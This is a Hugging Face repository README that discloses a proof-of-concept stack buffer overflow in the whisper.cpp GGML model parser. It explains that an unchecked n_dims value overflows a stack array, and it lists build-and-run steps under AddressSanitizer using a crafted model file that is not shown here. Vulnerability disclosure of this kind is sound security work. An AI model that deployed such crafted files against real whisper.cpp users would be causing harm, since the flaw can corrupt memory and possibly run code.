Hugging Face's logo

Rammadaeus
/
poc-whisper-stack-overflow-ndims

Model card Files
xet
Community
poc-whisper-stack-overflow-ndims / README.md
Rammadaeus's picture
Rammadaeus
Add PoC and reproduction instructions
86d6533 verified
preview code
|
raw
history blame contribute delete
899 Bytes

PoC: Stack Buffer Overflow in whisper.cpp GGML Parser

Format: GGML (.bin) Target: whisper.cpp (ggml-org/whisper.cpp) CWE: CWE-121 (Stack-based Buffer Overflow)

Vulnerability

Stack buffer overflow via unchecked n_dims in tensor loading. n_dims > 4 causes writes past the ne[4] stack array with attacker-controlled values. Potential RCE.

Reproduction 

git clone https://github.com/ggml-org/whisper.cpp && cd whisper.cpp
mkdir build-asan && cd build-asan
cmake .. -DCMAKE_C_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
  -DCMAKE_CXX_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
  -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address,undefined"
make -j$(nproc)
./bin/whisper-cli -m ../poc_stack_overflow.bin -f /dev/null

ASAN reports: stack-buffer-overflow WRITE at whisper.cpp:1885

Tested: whisper.cpp commit 364c77f4